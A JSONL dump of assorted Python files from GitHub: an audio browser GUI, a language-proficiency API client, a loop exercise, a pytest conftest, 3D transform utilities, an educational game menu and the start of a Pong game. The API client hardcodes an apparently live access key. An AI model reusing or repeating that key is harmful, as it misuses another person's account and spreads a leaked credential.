step:\n lowpass_cutoff = highpass_cutoff + step\n self.update_filter(self.current_channel, None,\n lowpass_cutoff, True)\n\n\n def set_filter(self, highpass_cutoffs, lowpass_cutoffs):\n self.setting = True\n for c in range(self.data.channels):\n cf = c if c < len(highpass_cutoffs) else -1\n self.traces[c].set_filter(highpass_cutoffs[cf],\n lowpass_cutoffs[cf])\n self.axspecs[c].set_filter(highpass_cutoffs[cf],\n lowpass_cutoffs[cf])\n self.setting = False\n\n\n def update_filter(self, channel, highpass_cutoff,\n lowpass_cutoff, set_spec=False):\n if channel in self.selected_channels:\n for c in self.selected_channels:\n self.traces[c].set_filter(highpass_cutoff, lowpass_cutoff)\n if c != channel or set_spec:\n self.axspecs[c].set_filter(highpass_cutoff, lowpass_cutoff)\n else:\n self.traces[channel].set_filter(highpass_cutoff, lowpass_cutoff)\n self.sigFilterChanged.emit()\n\n\n def init_filter(self, highpass_cutoff, lowpass_cutoff):\n if highpass_cutoff is None:\n highpass_cutoff = 0.0\n if lowpass_cutoff is None:\n lowpass_cutoff = self.rate/2\n for t in self.traces:\n t.set_filter(highpass_cutoff, lowpass_cutoff)\n for axs in self.axspecs:\n axs.set_filter(highpass_cutoff, lowpass_cutoff)\n\n \n def all_channels(self):\n self.selected_channels = list(self.show_channels)\n self.update_borders()\n\n\n def next_channel(self):\n if len(self.show_channels) == 1:\n self.show_channel(self.current_channel + 1)\n else:\n idx = self.show_channels.index(self.current_channel)\n if idx + 1 < len(self.show_channels):\n self.current_channel = self.show_channels[idx + 1]\n self.selected_channels = [self.current_channel]\n self.update_borders()\n\n\n def previous_channel(self):\n if len(self.show_channels) == 1:\n self.show_channel(self.current_channel - 1)\n else:\n idx = self.show_channels.index(self.current_channel)\n if idx > 0:\n self.current_channel = self.show_channels[idx - 1]\n self.selected_channels = [self.current_channel]\n self.update_borders()\n\n\n def select_next_channel(self):\n if len(self.show_channels) == 1:\n self.show_channel(self.current_channel + 1)\n else:\n idx = self.show_channels.index(self.current_channel)\n if idx + 1 < len(self.show_channels):\n self.current_channel = self.show_channels[idx + 1]\n self.selected_channels.append(self.current_channel)\n self.update_borders()\n\n\n def select_previous_channel(self):\n if len(self.show_channels) == 1:\n self.show_channel(self.current_channel - 1)\n else:\n idx = self.show_channels.index(self.current_channel)\n if idx > 0:\n self.current_channel = self.show_channels[idx - 1]\n self.selected_channels.append(self.current_channel)\n self.update_borders()\n\n \n def select_channels(self, channels):\n sc = [c for c in channels if c in self.show_channels]\n if len(sc) == 0:\n return\n self.selected_channels = sc\n if not self.current_channel in self.selected_channels:\n for c in self.selected_channels:\n if c >= self.current_channel:\n self.current_channel = c\n break\n else:\n if len(self.selected_channels) > 0:\n self.current_channel = self.selected_channels[0]\n self.update_borders()\n \n \n def set_channels(self, show_channels=None, selected_channels=None):\n if not show_channels is None:\n if self.data is None:\n self.channels = show_channels\n return\n self.show_channels = [c for c in show_channels if c < len(self.figs)]\n self.selected_channels = [c for c in selected_channels if c < len(self.figs)]\n if not self.current_channel in self.selected_channels:\n for c in self.selected_channels:\n if c >= self.current_channel:\n self.current_channel = c\n break\n if not self.current_channel in self.selected_channels:\n self.current_channel = self.selected_channels[-1]\n for c in range(len(self.figs)):\n self.figs[c].setVisible(c in self.show_channels)\n self.show_xticks(c, c == self.show_channels[-1])\n self.acts.channels[c].setChecked(c in self.show_channels)\n self.adjust_layout(self.width(), self.height())\n self.update_borders()\n \n \n def toggle_channel(self, channel):\n if self.acts.channels[channel].isChecked():\n if not channel in self.show_channels:\n self.show_channels.append(channel)\n self.show_channels.sort()\n self.selected_channels.append(channel)\n self.selected_channels.sort()\n self.set_channels()\n else:\n if channel in self.show_channels:\n self.show_channels.remove(channel)\n if len(self.show_channels) == 0:\n c = channel + 1\n if c >= self.data.channels:\n c = 0\n self.show_channels = [c]\n if not c in self.selected_channels:\n self.selected_channels.append(c)\n self.selected_channels.sort()\n if channel in self.selected_channels:\n self.selected_channels.remove(channel)\n if len(self.selected_channels) == 0:\n for c in self.show_channels:\n if c < channel:\n self.current_channel = c\n else:\n break\n self.selected_channels = [self.current_channel]\n #if len(self.show_channels) == 1:\n # self.acts.channels[self.show_channels[0]].setCheckable(False)\n self.set_channels()\n self.setFocus()\n\n \n def show_channel(self, channel):\n if channel < 0 or channel >= len(self.figs):\n return\n self.current_channel = channel\n self.set_channels([channel], [channel])\n\n \n def set_panels(self, traces=None, specs=None, cbars=None):\n if not traces is None:\n self.show_traces = traces\n if not specs is None:\n self.show_specs = specs\n if not cbars is None:\n self.show_cbars = cbars\n for axt, axs, cb in zip(self.axtraces, self.axspecs, self.cbars):\n axt.setVisible(self.show_traces)\n axs.setVisible(self.show_specs > 0)\n cb.setVisible(self.show_specs > 0 and self.show_cbars)\n if axt is self.axtraces[self.show_channels[-1]]:\n axs.getAxis('bottom').showLabel(not self.show_traces)\n axs.getAxis('bottom').setStyle(showValues=not self.show_traces)\n axt.getAxis('bottom').showLabel(self.show_traces)\n axt.getAxis('bottom').setStyle(showValues=self.show_traces)\n self.adjust_layout(self.width(), self.height())\n \n\n def toggle_traces(self):\n self.show_traces = not self.show_traces\n if not self.show_traces:\n self.show_specs = 1\n self.set_panels()\n \n\n def toggle_spectrograms(self):\n self.show_specs += 1\n if self.show_specs > 4:\n self.show_specs = 0\n if self.show_specs == 0:\n self.show_traces = True\n self.set_panels()\n\n \n def toggle_colorbars(self):\n self.show_cbars = not self.show_cbars\n for cb, axs in zip(self.cbars, self.axspecs):\n if axs.isVisible():\n cb.setVisible(self.show_cbars)\n \n \n def set_fulldata(self, show):\n self.show_fulldata = show\n self.datafig.setVisible(self.show_fulldata)\n self.adjust_layout(self.width(), self.height())\n \n \n def toggle_fulldata(self):\n self.show_fulldata = not self.show_fulldata\n self.set_fulldata(self.show_fulldata)\n \n \n def toggle_grids(self):\n self.grids -= 1\n if self.grids < 0:\n self.grids = 3\n for c in self.selected_channels:\n for ax in self.axgs[c]:\n ax.showGrid(x=(self.grids & 1) > 0, y=(self.grids & 2) > 0,\n alpha=0.8)\n # fix grid bug:\n ax.getAxis('bottom').setGrid(False)\n ax.getAxis('left').setGrid(False)\n for axis in ['right', 'top']:\n ax.showAxis(axis)\n ax.getAxis(axis).setStyle(showValues=False)\n\n\n def set_zoom_mode(self, mode):\n for axs in self.axs:\n for ax in axs:\n ax.getViewBox().setMouseMode(mode)\n\n\n def zoom_back(self):\n for axs in self.axs:\n for ax in axs:\n ax.getViewBox().zoom_back()\n\n\n def zoom_forward(self):\n for axs in self.axs:\n for ax in axs:\n ax.getViewBox().zoom_forward()\n\n\n def zoom_home(self):\n for axs in self.axs:\n for ax in axs:\n ax.getViewBox().zoom_home()\n\n\n def set_region_mode(self, mode):\n self.region_mode = mode\n\n\n def region_menu(self, channel, vbox, rect):\n if self.region_mode == DataBrowser.zoom_region:\n vbox.zoom_region(rect)\n elif self.region_mode == DataBrowser.play_region:\n self.play_region(rect.left(), rect.right())\n elif self.region_mode == DataBrowser.save_region:\n self.save_region(rect.left(), rect.right())\n elif self.region_mode == DataBrowser.ask_region:\n menu = QMenu(self)\n zoom_act = menu.addAction('&Zoom')\n #analyze_act = menu.addAction('&Analyze')\n play_act = menu.addAction('&Play')\n save_act = menu.addAction('&Save as')\n #crop_act = menu.addAction('&Crop')\n act = menu.exec(QCursor.pos())\n if act is zoom_act:\n vbox.zoom_region(rect)\n elif act is play_act:\n self.play_region(rect.left(), rect.right())\n elif act is save_act:\n self.save_region(rect.left(), rect.right())\n vbox.hide_region()\n\n\n def play_scroll(self):\n if self.scroll_timer.isActive():\n self.scroll_timer.stop()\n self.scroll_step /= 2\n elif self.audio_timer.isActive():\n self.audio.stop()\n self.audio_timer.stop()\n for amarkers in self.audio_markers:\n for vmarker in amarkers:\n vmarker.setValue(-1)\n else:\n self.play_window()\n \n\n def auto_scroll(self):\n if self.scroll_step == 0:\n self.scroll_step = 0.05\n elif self.scroll_step > 1.0:\n if self.scroll_timer.isActive():\n self.scroll_timer.stop()\n self.scroll_step = 0\n return\n else:\n self.scroll_step *= 2\n if not self.scroll_timer.isActive():\n self.scroll_timer.start(20)\n\n \n def scroll_further(self):\n if self.toffset + self.twindow > self.tmax:\n self.scroll_timer.stop()\n self.scroll_step /= 2\n else:\n self.set_times(self.toffset + self.scroll_step)\n\n\n def play_region(self, t0, t1):\n i0 = int(np.round(t0*self.rate))\n i1 = int(np.round(t1*self.rate))\n playdata = 1.0*self.data[i0:i1, self.selected_channels]\n fade(playdata, self.rate, 0.1)\n self.audio.play(playdata, self.rate, blocking=False)\n self.audio_time = t0\n self.audio_tmax = t1\n self.audio_timer.start(50)\n for c in range(self.data.channels):\n atime = self.audio_time if c in self.selected_channels else -1\n for vmarker in self.audio_markers[c]:\n vmarker.setValue(atime)\n\n\n def play_window(self):\n self.play_region(self.toffset, self.toffset + self.twindow)\n\n \n def mark_audio(self):\n self.audio_time += 0.05\n for amarkers in self.audio_markers:\n for vmarker in amarkers:\n if vmarker.value() >= 0:\n vmarker.setValue(self.audio_time)\n if self.audio_time > self.audio_tmax:\n self.audio_timer.stop()\n for amarkers in self.audio_markers:\n for vmarker in amarkers:\n vmarker.setValue(-1)\n\n \n def save_region(self, t0, t1):\n\n def secs_to_str(time):\n hours = time//3600\n time -= 3600*hours\n mins = time//60\n time -= 60*mins\n secs = int(np.floor(time))\n time -= secs\n msecs = f'{1000*time:03.0f}ms'\n if hours > 0:\n return f'{hours}h{mins}m{secs}s{msecs}'\n elif mins > 0:\n return f'{mins}m{secs}s{msecs}'\n elif secs > 0:\n return f'{secs}s{msecs}'\n else:\n return msecs\n\n i0 = int(np.round(t0*self.rate))\n i1 = int(np.round(t1*self.rate))\n name = os.path.splitext(os.path.basename(self.file_path))[0]\n #if self.channel > 0:\n # filename = f'{name}-{channel:d}-{t0:.4g}s-{t1s:.4g}s.wav'\n t0s = secs_to_str(t0)\n t1s = secs_to_str(t1)\n file_name = f'{name}-{t0s}-{t1s}.wav'\n formats = available_formats()\n for f in ['MP3', 'OGG', 'WAV']:\n if 'WAV' in formats:\n formats.remove(f)\n formats.insert(0, f)\n filters = ['All files (*)'] + [f'{f} files (*.{f}, *.{f.lower()})' for f in formats]\n file_path = os.path.join(os.path.dirname(self.file_path), file_name)\n file_path = QFileDialog.getSaveFileName(self, 'Save region as',\n file_path,\n ';;'.join(filters))[0]\n if file_path:\n write_audio(file_path, self.data[i0:i1,:], self.rate)\n print('saved region to: ' , file_path)\n\n \n def save_window(self):\n self.save_region(self.toffset, self.toffset + self.twindow)\n","repo_name":"bendalab/audian","sub_path":"audian/databrowser.py","file_name":"databrowser.py","file_ext":"py","file_size_in_byte":60757,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"24159674884","text":"import json\nimport requests\n\nkey = '265cc97a8fc6bb1b657b3969b673f19f'\nformat = 'text' \nurl = \"https://portulanclarin.net/workbench/lx-proficiency/api/\"\n\n\ntext = '''\nOlá, meu nome é Miguel, e eu venho dos Açores. Tenho 35 anos e sou engenheiro civil.\n'''\n\nrequest_data = {\n 'method': 'analyse',\n 'jsonrpc': '2.0',\n 'id': 0,\n 'params': {\n 'text': text,\n 'format': format,\n 'key': key,\n },\n}\nrequest = requests.post(url, json=request_data)\nresponse_data = request.json()\nif \"error\" in response_data:\n print(\"Error:\", response_data[\"error\"])\nelse:\n print(\"Result:\")\n print(response_data[\"result\"].split(\"\\n\")[4][-2:])\n\n\n\n# Getting acess key status:\nrequest_data = {\n 'method': 'key_status',\n 'jsonrpc': '2.0',\n 'id': 0,\n 'params': {\n 'key': key,\n },\n}\nrequest = requests.post(url, json=request_data)\nresponse_data = request.json()\nif \"error\" in response_data:\n print(\"Error:\", response_data[\"error\"])\nelse:\n print(\"Key status:\")\n print(json.dumps(response_data[\"result\"], indent=4))","repo_name":"joaoDossena/MasterThesis","sub_path":"Task 1 - Proficiency classification/portuclarin_lx_proficiency.py","file_name":"portuclarin_lx_proficiency.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28458276229","text":"# while loop\n\ni = 0\n\nwhile i < 10: # i = 0 , 0<10 , i =1 , 1<10\n if i % 2 == 0:\n print(i,\"even\")\n else:\n print(i,\"odd\") \n i = i + 1 #1,2\n print(\"Thank you\")\n","repo_name":"mogan92/chn6263","sub_path":"whileloop.py","file_name":"whileloop.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74810198345","text":"import pytest\n\nfrom tests.common.fixtures.advanced_reboot import get_advanced_reboot\nfrom .args.advanced_reboot_args import add_advanced_reboot_args\nfrom .args.cont_warm_reboot_args import add_cont_warm_reboot_args\nfrom .args.normal_reboot_args import add_normal_reboot_args\n\n\n@pytest.fixture(autouse=True, scope=\"module\")\ndef skip_on_simx(duthost):\n platform = duthost.facts[\"platform\"]\n if \"simx\" in platform:\n pytest.skip('skipped on this platform: {}'.format(platform))\n\n\n# Platform pytest arguments\ndef pytest_addoption(parser):\n add_advanced_reboot_args(parser)\n add_cont_warm_reboot_args(parser)\n add_normal_reboot_args(parser)\n\n\ndef pytest_generate_tests(metafunc):\n if 'power_off_delay' in metafunc.fixturenames:\n delays = metafunc.config.getoption('power_off_delay')\n default_delay_list = [5, 15]\n if not delays:\n # if power_off_delay option is not present, set it to default [5, 15] for backward compatible\n metafunc.parametrize('power_off_delay', default_delay_list)\n else:\n try:\n delay_list = [int(delay.strip()) for delay in delays.split(',')]\n metafunc.parametrize('power_off_delay', delay_list)\n except ValueError:\n metafunc.parametrize('power_off_delay', default_delay_list)\n","repo_name":"ANISH-GOTTAPU/sonic-mgmt-anish","sub_path":"tests/platform_tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15733570079","text":"import torch\n\n\ndef transform_voxel_to_match_image(voxel):\n # in: bsz, channels, height, width, depth\n # out: bsz, channels, width, height, depth\n voxel = voxel.permute(0, 1, 3, 2, 4)\n # for camera mirror flip across width\n voxel = voxel.flip(2)\n\n return voxel\n\n\ndef generate_transform_matrix(transform_params):\n # bsz = transform_params.size(0)\n Ry = rad2Ry(transform_params[:, 0])\n Rx = rad2Rx(transform_params[:, 1])\n # Rz = rad2Ry(transform_params[:, 0])\n S = scale2S(transform_params[:, 3:6])\n T = translation2T(transform_params[:, 6:])\n\n # transforms are performed from left to right\n # first rotation, then scale and finally translation\n A = torch.bmm(torch.bmm(torch.bmm(Ry, Rx), S), T)\n return A\n\n\ndef generate_transform_matrix_with_recentering(\n transform_params, in_size=64, out_size=64\n):\n bsz = transform_params.size(0)\n Ry = rad2Ry(transform_params[:, 0])\n Rx = rad2Rx(transform_params[:, 1])\n # Rz = rad2Ry(transform_params[:, 0])\n S = scale2S(transform_params[:, 3:6])\n T = translation2T(transform_params[:, 6:])\n\n # Move origin to old grid center translation\n # This is to rotate the objects around it's origin\n CO = (\n translation2T(torch.tensor([[-in_size * 0.5, -in_size * 0.5, -in_size * 0.5]]))\n .repeat(bsz, 1, 1)\n .to(transform_params.device)\n )\n # Move origin to new grid border\n DN = (\n translation2T(torch.tensor([[out_size * 0.5, out_size * 0.5, out_size * 0.5]]))\n .repeat(bsz, 1, 1)\n .to(transform_params.device)\n )\n\n # DN * T * S * Rx * Ry * CO\n A = torch.bmm(torch.bmm(torch.bmm(torch.bmm(torch.bmm(DN, T), S), Rx), Ry), CO)\n return A\n\n\ndef generate_inv_transform_matrix(\n transform_params, in_size=64, out_size=64,\n):\n bsz = transform_params.size(0)\n Ry_inv = invR(rad2Ry(transform_params[:, 0]))\n Rx_inv = invR(rad2Ry(transform_params[:, 1]))\n # Rz = rad2Ry(transform_params[:, 0])\n S_inv = invS(scale2S(transform_params[:, 3:6]))\n T_inv = invT(translation2T(transform_params[:, 6:]))\n\n # Move origin to old grid center translation\n # This is to rotate the objects around it's origin\n CO_inv = (\n invT(\n translation2T(\n torch.tensor([[-in_size * 0.5, -in_size * 0.5, -in_size * 0.5]])\n )\n )\n .repeat(bsz, 1, 1)\n .to(transform_params.device)\n )\n # Move origin to new grid border\n DN_inv = (\n invT(\n translation2T(\n torch.tensor([[out_size * 0.5, out_size * 0.5, out_size * 0.5]])\n )\n )\n .repeat(bsz, 1, 1)\n .to(transform_params.device)\n )\n\n # CO^-1 * Ry^-1 * Rx^-1 * S^-1 * T^-1 * DN^-1\n A = torch.bmm(\n torch.bmm(\n torch.bmm(torch.bmm(torch.bmm(CO_inv, Ry_inv), Rx_inv), S_inv), T_inv\n ),\n DN_inv,\n )\n return A\n\n\ndef rad2Ry(radians, requires_grad=False):\n bsz = radians.size(0)\n radians = radians.view(bsz)\n R = torch.eye(4).unsqueeze(0).repeat(bsz, 1, 1)\n R[:, 0, 0] = torch.cos(radians)\n R[:, 0, 2] = -torch.sin(radians)\n R[:, 2, 0] = torch.sin(radians)\n R[:, 2, 2] = torch.cos(radians)\n\n return R.to(radians.device)\n\n\ndef rad2Rx(radians, requires_grad=False):\n bsz = radians.size(0)\n radians = radians.view(bsz)\n R = torch.eye(4).unsqueeze(0).repeat(bsz, 1, 1)\n R[:, 0, 0] = torch.cos(radians)\n R[:, 0, 1] = torch.sin(radians)\n R[:, 1, 0] = -torch.sin(radians)\n R[:, 1, 1] = torch.cos(radians)\n\n return R.to(radians.device)\n\n\ndef invR(R):\n return R.transpose(1, 2)\n\n\ndef translation2T(translation, requires_grad=False):\n bsz = translation.size(0)\n T = torch.eye(4).unsqueeze(0).repeat(bsz, 1, 1)\n T[:, :3, 3] = translation\n\n return T.to(translation.device)\n\n\ndef invT(T):\n T_inv = T.clone()\n T_inv[:, :3, 3] = -T_inv[:, :3, 3]\n return T_inv\n\n\ndef scale2S(scale):\n bsz = scale.size(0)\n S = torch.eye(4).unsqueeze(0).repeat(bsz, 1, 1)\n S[:, 0, 0] = scale[:, 0]\n S[:, 1, 1] = scale[:, 1]\n S[:, 2, 2] = scale[:, 2]\n\n return S.to(scale.device)\n\n\ndef invS(S):\n r = 1 / S.diagonal(dim1=1, dim2=2)\n S_inv = S.clone()\n S_inv[:, 0, 0] = r[:, 0]\n S_inv[:, 1, 1] = r[:, 1]\n S_inv[:, 2, 2] = r[:, 2]\n return S_inv\n","repo_name":"sebamenabar/SPACE-Pytorch-Implementation","sub_path":"utils/transformation_utils.py","file_name":"transformation_utils.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"30199303238","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport pygame\nimport classes.board\nimport classes.game_driver as gd\nimport classes.level_controller as lc\nimport classes.menu_items\n\n\nclass Board(gd.BoardGame):\n def __init__(self, mainloop, speaker, config, screen_w, screen_h):\n self.level = lc.Level(self, mainloop, 1, 1)\n gd.BoardGame.__init__(self, mainloop, speaker, config, screen_w, screen_h, 25, 16)\n\n def create_game_objects(self, level=1):\n self.board.draw_grid = False\n self.show_info_btn = False\n self.mainloop.menu_level = 0\n\n self.unit_mouse_over = None\n\n if self.mainloop.scheme is not None:\n if self.mainloop.scheme.dark:\n self.scheme_dir = \"black\"\n color = (0, 0, 0, 0)\n else:\n self.scheme_dir = \"white\"\n color = (255, 255, 255, 0)\n else:\n self.scheme_dir = \"white\"\n color = (255, 255, 255, 0)\n\n self.color = color\n font_color2 = (20, 75, 92)\n self.digits = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n self.imput_limit = 3\n\n data = [25, 16]\n\n x_count = self.get_x_count(data[1], even=False)\n if x_count > 25:\n data[0] = x_count\n\n self.data = data\n\n self.vis_buttons = [0, 0, 0, 0, 1, 0, 1, 0, 0]\n self.mainloop.info.hide_buttonsa(self.vis_buttons)\n self.layout.update_layout(data[0], data[1])\n self.scale = self.layout.scale\n self.board.level_start(data[0], data[1], self.scale)\n self.board.board_bg.initcolor = color\n self.board.board_bg.color = color\n self.board.board_bg.update_me = True\n self.board.board_bg.line_color = (20, 20, 20)\n\n self.last_hover = None\n self.board.add_unit(data[0] - 7, 0, 7, 1, classes.board.Label, \"v.%s\" % self.mainloop.config.version,\n color, \"\", 2)\n self.board.units[-1].align = 2\n self.board.units[-1].font_color = font_color2\n\n # main category item locations and icons\n posx = [data[0] // 2 - 8, data[0] // 2 - 2, data[0] // 2 + 4]\n ico = [\"ico_tn_00.png\", \"ico_tn_01.png\", \"ico_tn_02.png\"]\n\n # activity quick launch\n self.board.add_unit(posx[1], 13, 5, 1, classes.board.Letter, \"\", color, \"\", 0)\n self.board.ships[-1].font_color = font_color2\n self.board.ships[-1].immobilize()\n\n\n self.board.add_unit(7, 0, data[0]-14, 4, classes.board.ImgCenteredShip, \"\", color, \"home_screen_icon.png\", alpha=True)\n\n self.board.ships[-1].immobilize()\n\n self.board.add_unit(0, 5, data[0], 3, classes.board.ImgCenteredShip, \"\", color,\n os.path.join(\"schemes\", self.scheme_dir, 'home_logo.png'))\n self.board.ships[-1].immobilize()\n\n\n self.board.add_unit((data[0]-11)//2, 14, 11, 2, classes.board.Label,\n [\"www.eduactiv8.org | info%seduactiv8%sorg\" % (\"@\", \".\"),\n \"Copyright (C) 2012 - 2021 Ireneusz Imiolek\"], color, \"\", 3)\n self.board.units[-1].font_color = font_color2\n self.board.units[-1].update_lng_font_size(\"def_2.0\")\n\n self.top_categories = []\n self.units = []\n i = 0\n for each in self.mainloop.m.top_categories:\n self.top_categories.append(each)\n\n unit = classes.menu_items.TopCategory(self, self.top_categories[-1], posx[i], 8, 5, 5,\n i, self.color, ico[i],\n decor=self.mainloop.cl.color_sliders[6][0], sequence_id=i)\n self.units.append(unit)\n self.board.all_sprites_list.add(unit)\n i += 1\n\n #add home info icons\n self.home_icons = [[\"home_icon_1.png\", \"home_icon_2.png\", \"home_icon_3.png\", \"home_icon_4.png\"],\n [\"home_ico_1.png\", \"home_ico_2.png\", \"home_ico_3.png\", \"home_ico_4.png\"]]\n\n self.board.add_unit(data[0]-5, data[1] - 2, 3, 2, classes.board.ImgCenteredShip, \"\", color,\n os.path.join(\"home_icons\", \"home_icon_1.png\"), alpha=True)\n self.board.ships[-1].immobilize()\n\n self.board.add_unit(0, data[1]-2, 2, 2, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", \"home_icon_2.png\"), alpha=True)\n self.board.ships[-1].immobilize()\n\n self.board.add_unit((data[0]-11)//2-2, data[1]-2, 2, 2, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", \"home_icon_3.png\"), alpha=True)\n self.board.ships[-1].immobilize()\n\n self.board.add_unit(data[0]//2 + 6, data[1]-2, 2, 2, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", \"home_icon_4.png\"), alpha=True)\n self.board.ships[-1].immobilize()\n\n # add scheme switchers\n if self.mainloop.scheme_code is None:\n img = 'score_hc_anone_l.png'\n else:\n img = 'score_hc_none_l.png'\n self.board.add_unit(data[0]-2, data[1]-2, 1, 1, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", img), alpha=True)\n self.board.ships[-1].immobilize()\n\n if self.mainloop.scheme_code == \"WB\":\n img = 'score_hc_awb_l.png'\n else:\n img = 'score_hc_wb_l.png'\n self.board.add_unit(data[0]-2, data[1]-1, 1, 1, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", img), alpha=True)\n self.board.ships[-1].immobilize()\n\n if self.mainloop.scheme_code == \"BW\":\n img = 'score_hc_abw_l.png'\n else:\n img = 'score_hc_bw_l.png'\n self.board.add_unit(data[0]-1, data[1]-2, 1, 1, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", img), alpha=True)\n self.board.ships[-1].immobilize()\n\n if self.mainloop.scheme_code == \"BY\":\n img = 'score_hc_aby_l.png'\n else:\n img = 'score_hc_by_l.png'\n self.board.add_unit(data[0]-1, data[1]-1, 1, 1, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", img), alpha=True)\n self.board.ships[-1].immobilize()\n\n # check if espeak icon needs disabling on display of home screen\n if self.lang.lang in self.lang.tts_disabled_lngs:\n self.mainloop.sb.espeak_avail(False)\n else:\n self.mainloop.sb.espeak_avail(True)\n\n def handle(self, event):\n gd.BoardGame.handle(self, event)\n if event.type == pygame.KEYDOWN and (event.key != pygame.K_RETURN and event.key != pygame.K_KP_ENTER):\n self.active_unit = self.board.ships[0]\n lhv = len(self.active_unit.value)\n self.changed_since_check = True\n if event.key == pygame.K_BACKSPACE:\n if lhv > 0:\n self.active_unit.value = self.active_unit.value[0:lhv - 1]\n else:\n char = event.unicode\n if len(char) > 0 and (char in self.digits):\n if lhv < self.imput_limit:\n self.active_unit.value += char\n else:\n self.active_unit.value = char\n self.active_unit.update_me = True\n self.mainloop.redraw_needed[0] = True\n elif event.type == pygame.KEYDOWN and (event.key == pygame.K_RETURN or event.key == pygame.K_KP_ENTER):\n lhv = len(self.active_unit.value)\n if lhv > 0:\n try:\n activity_id = int(self.active_unit.value)\n if activity_id > 0:\n self.start_game(activity_id)\n except:\n pass\n\n if event.type == pygame.MOUSEMOTION or event.type == pygame.MOUSEBUTTONUP:\n pos = [event.pos[0] - self.layout.game_left, event.pos[1] - self.layout.top_margin]\n found = False\n for each in self.units:\n if each.rect.left < pos[0] < each.rect.right and each.rect.top < pos[1] < each.rect.bottom:\n if each != self.unit_mouse_over:\n if self.unit_mouse_over is not None:\n self.unit_mouse_over.mouse_out()\n self.unit_mouse_over = each\n found = True\n each.handle(event)\n break\n if not found:\n if self.unit_mouse_over is not None:\n self.unit_mouse_over.mouse_out()\n self.unit_mouse_over = None\n\n if event.type == pygame.MOUSEMOTION:\n pos = [event.pos[0] - self.layout.game_left, event.pos[1] - self.layout.top_margin]\n for i in range(-8, -4):\n if (self.board.ships[i].rect.left < pos[0] < self.board.ships[i].rect.right\n and self.board.ships[i].rect.top < pos[1] < self.board.ships[i].rect.bottom):\n self.board.ships[i].change_image(os.path.join(\"home_icons\", self.home_icons[1][8 + i]))\n self.board.ships[i].update_me = True\n self.mainloop.redraw_needed[0] = True\n else:\n self.board.ships[i].change_image(os.path.join(\"home_icons\", self.home_icons[0][8 + i]))\n self.board.ships[i].update_me = True\n self.mainloop.redraw_needed[0] = True\n\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n active = self.board.active_ship\n if active > 0:\n if self.board.ships[active] == self.board.ships[-4]:\n self.mainloop.switch_scheme(None)\n elif self.board.ships[active] == self.board.ships[-3]:\n self.mainloop.switch_scheme(\"WB\")\n elif self.board.ships[active] == self.board.ships[-2]:\n self.mainloop.switch_scheme(\"BW\")\n elif self.board.ships[active] == self.board.ships[-1]:\n self.mainloop.switch_scheme(\"BY\")\n\n elif self.board.ships[active] == self.board.ships[-8]:\n self.start_game(273)\n elif self.board.ships[active] == self.board.ships[-7]:\n self.start_game(3)\n elif self.board.ships[active] == self.board.ships[-6]:\n self.start_game(1)\n elif self.board.ships[active] == self.board.ships[-5]:\n self.start_game(2)\n\n def start_game(self, gameid):\n game_changed = self.mainloop.m.start_hidden_game(gameid)\n if game_changed:\n self.mainloop.menu_level = 1\n self.mainloop.menu_type = 1\n self.mainloop.info.realign()\n self.mainloop.info.reset_titles()\n else:\n self.board.ships[0].value = \"\"\n self.board.ships[0].update_me = True\n self.mainloop.redraw_needed[0] = True\n\n def update(self, game):\n game.fill(self.color)\n gd.BoardGame.update(self, game)\n\n def check_result(self):\n pass\n","repo_name":"imiolek-ireneusz/eduActiv8","sub_path":"game_boards/game000.py","file_name":"game000.py","file_ext":"py","file_size_in_byte":11242,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"81"} +{"seq_id":"12820929624","text":"import pygame\nimport sys\nimport math\nimport time\n\nclass Ball(object):\n def __init__(self, x, y, width, height, vx, vy, color):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.vx = vx\n self.vy = vy\n self.color = color\n\n def render(self, screen):\n pygame.draw.ellipse(screen, self.color, self.rect)\n\n def update(self):\n self.x += self.vx\n self.y += self.vy\n\n @property\n def rect(self):\n return pygame.Rect(self.x, self.y, self.width, self.height)\n\n\nclass Board1(object):\n def __init__(self, x, y, width, height, speed, color):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.vy = 0\n self.speed = speed\n self.color = color\n\n def render(self, screen):\n pygame.draw.rect(screen, self.color, self.rect)\n\n def update(self):\n self.y += self.vy\n\n def key_handler(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.vy = -self.speed\n elif event.key == pygame.K_DOWN:\n self.vy = self.speed\n elif event.key in (pygame.K_DOWN, pygame.K_UP):\n self.vy = 0\n\n @property\n def rect(self):\n return pygame.Rect(self.x, self.y, self.width, self.height)\n\nclass Board2(object):\n def __init__(self, x, y, width, height, speed, color):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.vy = 0\n self.speed = speed\n self.color = color\n\n def render(self, screen):\n pygame.draw.rect(screen, self.color, self.rect)\n\n def update(self):\n self.y += self.vy\n\n def key_handler(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_w:\n self.vy = -self.speed\n elif event.key == pygame.K_s:\n self.vy = self.speed\n elif event.key in (pygame.K_w, pygame.K_s):\n self.vy = 0\n\n @property\n def rect(self):\n return pygame.Rect(self.x, self.y, self.width, self.height)\n\nclass Pong(object):\n COLORS = {\"BLACK\": ( 0, 0, 0), \"WHITE\": (255, 255, 255), 